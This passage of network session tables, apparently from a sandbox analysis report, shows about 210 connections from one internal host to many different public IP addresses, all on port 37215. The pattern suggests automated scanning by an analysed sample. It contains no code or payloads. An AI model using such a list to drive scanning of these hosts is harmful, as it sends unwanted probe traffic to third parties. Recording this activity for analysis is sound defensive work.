                                                  12709192.168.2.136059441.106.162.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12710192.168.2.1341594172.209.218.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12711192.168.2.133589883.158.110.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12712192.168.2.1341208197.157.59.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12713192.168.2.133798441.199.211.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12714192.168.2.135828041.223.236.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12715192.168.2.133869041.119.146.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12716192.168.2.1336210157.201.34.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12717192.168.2.133484241.10.93.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12718192.168.2.1346002159.194.141.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12719192.168.2.135298441.47.27.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12720192.168.2.133622241.39.110.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12721192.168.2.1357752157.114.230.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12722192.168.2.1347136197.166.46.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12723192.168.2.1351158157.25.88.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12724192.168.2.1337954206.86.139.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12725192.168.2.1343102157.169.244.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12726192.168.2.1355328167.76.241.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12727192.168.2.1356344157.50.29.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12728192.168.2.135390441.217.155.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12729192.168.2.1357012197.186.196.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12730192.168.2.134842260.250.202.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12731192.168.2.135457681.201.102.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12732192.168.2.135599064.177.189.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12733192.168.2.1339032195.153.44.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12734192.168.2.1357772197.243.142.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12735192.168.2.135080641.95.179.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12736192.168.2.134206074.203.121.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12737192.168.2.133541641.201.103.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12738192.168.2.1353010157.31.2.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12739192.168.2.133417841.111.132.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12740192.168.2.1333882197.33.103.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12741192.168.2.1343388157.150.139.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12742192.168.2.1352712157.130.136.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12743192.168.2.1340160111.50.171.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12744192.168.2.134505841.227.246.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12745192.168.2.1345252157.121.243.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12746192.168.2.1358216197.9.167.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12747192.168.2.1359122197.106.92.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12748192.168.2.135440870.131.28.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12749192.168.2.1340792157.129.143.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12750192.168.2.1351968157.230.201.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12751192.168.2.133336041.150.47.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12752192.168.2.134806441.173.45.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12753192.168.2.1343642197.204.208.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12754192.168.2.135680441.20.36.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12755192.168.2.135779840.205.28.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12756192.168.2.1335130197.21.136.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12757192.168.2.133642012.133.232.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12758192.168.2.1339030157.196.6.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12759192.168.2.135567641.25.161.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12760192.168.2.1337500199.209.12.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12761192.168.2.1342034157.161.97.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12762192.168.2.1342970207.93.202.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12763192.168.2.133652641.75.123.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12764192.168.2.1347266128.50.43.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12765192.168.2.1353970157.4.141.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12766192.168.2.133448441.114.169.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12767192.168.2.1337874188.170.0.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12768192.168.2.135201641.173.110.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12769192.168.2.134119841.3.250.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12770192.168.2.1342344157.227.76.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12771192.168.2.1348222210.170.57.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12772192.168.2.135234441.191.129.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12773192.168.2.1350330144.230.108.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12774192.168.2.134265041.56.17.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12775192.168.2.1342924197.170.180.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12776192.168.2.1348636157.138.1.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12777192.168.2.1354368208.37.168.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12778192.168.2.1334316197.230.116.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12779192.168.2.1358702197.133.70.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12780192.168.2.1350126157.103.45.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12781192.168.2.1345596197.159.91.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12782192.168.2.1337626157.66.36.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12783192.168.2.135542641.16.38.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12784192.168.2.1351970197.100.7.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12785192.168.2.1359792197.91.89.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12786192.168.2.1334220222.253.48.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12787192.168.2.1344374220.108.179.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12788192.168.2.1346342157.97.52.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12789192.168.2.134946641.148.117.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12790192.168.2.1333160157.252.142.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12791192.168.2.133604441.24.184.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12792192.168.2.1347524157.251.31.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12793192.168.2.135087071.150.6.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12794192.168.2.134842441.4.240.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12795192.168.2.1357610197.21.155.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12796192.168.2.134859441.17.119.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12797192.168.2.135469641.226.226.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12798192.168.2.1344312197.162.30.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12799192.168.2.1360378157.238.194.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12800192.168.2.133998041.184.153.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12801192.168.2.1358018197.132.150.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12802192.168.2.1355062157.144.180.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12803192.168.2.1341862197.176.74.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12804192.168.2.1347870157.188.176.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12805192.168.2.1357930199.196.153.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12806192.168.2.1335566126.250.42.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12807192.168.2.1352172197.123.180.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12808192.168.2.133564041.213.180.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12809192.168.2.1340026157.233.5.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12810192.168.2.1338366157.160.165.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12811192.168.2.135838637.0.122.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12812192.168.2.1350980197.135.30.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12813192.168.2.133740641.86.120.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12814192.168.2.1344072197.46.223.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12815192.168.2.135688491.54.81.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12816192.168.2.1333770197.240.236.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12817192.168.2.135745441.193.222.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12818192.168.2.135662041.104.208.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12819192.168.2.1335830195.156.102.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12820192.168.2.1356942157.29.70.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12821192.168.2.1339170208.199.14.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12822192.168.2.1334658197.26.197.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12823192.168.2.1356708157.37.184.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12824192.168.2.1335848157.84.74.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12825192.168.2.135862035.184.49.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12826192.168.2.1348732197.119.95.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12827192.168.2.134493241.126.126.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12828192.168.2.1336540123.59.99.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12829192.168.2.135194841.197.19.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12830192.168.2.133532841.43.138.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12831192.168.2.1350944157.97.98.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12832192.168.2.134242841.248.221.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12833192.168.2.1334682157.87.41.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12834192.168.2.135115441.156.171.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12835192.168.2.1339998121.123.31.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12836192.168.2.134908441.91.45.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12837192.168.2.1337448112.208.105.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12838192.168.2.135123241.171.89.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12839192.168.2.134013241.42.90.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12840192.168.2.1359292157.7.55.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12841192.168.2.1353380157.16.28.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12842192.168.2.134802671.174.16.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12843192.168.2.1346296149.236.218.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12844192.168.2.1356864122.61.98.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12845192.168.2.1336116157.83.83.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12846192.168.2.1334212197.183.112.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12847192.168.2.1336382197.147.241.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12848192.168.2.135520841.90.180.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12849192.168.2.1353158157.128.117.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12850192.168.2.134273841.32.43.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12851192.168.2.1346316159.50.67.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12852192.168.2.1348466165.19.102.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12853192.168.2.134035441.243.125.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12854192.168.2.1347718158.146.241.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12855192.168.2.133619241.45.7.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12856192.168.2.135761251.16.228.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12857192.168.2.134547241.3.80.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12858192.168.2.134151075.153.59.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12859192.168.2.134245425.54.76.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12860192.168.2.135599041.171.222.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12861192.168.2.1360292180.176.50.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12862192.168.2.1337534197.116.42.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12863192.168.2.1359246197.163.248.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12864192.168.2.1333336197.164.207.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12865192.168.2.134609041.91.214.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12866192.168.2.133799870.124.193.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12867192.168.2.1340350174.177.90.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12868192.168.2.133507041.81.239.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12869192.168.2.133561041.34.155.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12870192.168.2.134400641.135.218.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12871192.168.2.135643441.240.189.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12872192.168.2.1346630157.141.168.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12873192.168.2.134022241.240.161.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12874192.168.2.1348146197.210.121.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12875192.168.2.134350641.171.182.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12876192.168.2.1341330157.110.46.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12877192.168.2.134747037.164.101.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12878192.168.2.1359626157.126.96.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12879192.168.2.135097831.24.126.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12880192.168.2.1334594197.96.193.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12881192.168.2.1350300120.101.139.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12882192.168.2.135497441.171.58.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12883192.168.2.1334284100.143.83.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12884192.168.2.1350544157.229.4.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12885192.168.2.133742663.131.255.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12886192.168.2.1336738197.76.24.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12887192.168.2.135250237.211.108.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12888192.168.2.1349680197.11.184.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12889192.168.2.1338744197.245.118.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12890192.168.2.1353498197.70.189.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12891192.168.2.133793625.74.45.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12892192.168.2.133562041.220.131.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12893192.168.2.1342582197.246.15.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12894192.168.2.1349174147.119.106.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12895192.168.2.1344416157.24.130.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12896192.168.2.135578241.181.86.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12897192.168.2.1333040157.42.176.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12898192.168.2.1360302223.22.141.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12899192.168.2.135656887.15.179.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12900192.168.2.134673276.124.189.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12901192.168.2.1348930165.195.83.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12902192.168.2.1338576197.252.172.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12903192.168.2.134430441.114.126.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12904192.168.2.134269041.109.106.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12905192.168.2.1350354157.218.66.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12906192.168.2.135475893.213.173.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12907192.168.2.133735483.176.16.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12908192.168.2.1355282197.206.145.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12909192.168.2.1335782197.94.108.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12910192.168.2.1358622197.103.233.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12911192.168.2.1357486197.48.77.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12912192.168.2.135897041.97.170.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12913192.168.2.1349762197.174.19.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12914192.168.2.1345814197.242.230.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12915192.168.2.133313441.201.32.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12916192.168.2.1354810132.216.19.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12917192.168.2.134550635.185.187.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12918192.168.2.133733447.124.82.15937215
                                                  TimestampBytes transferredDirectionData


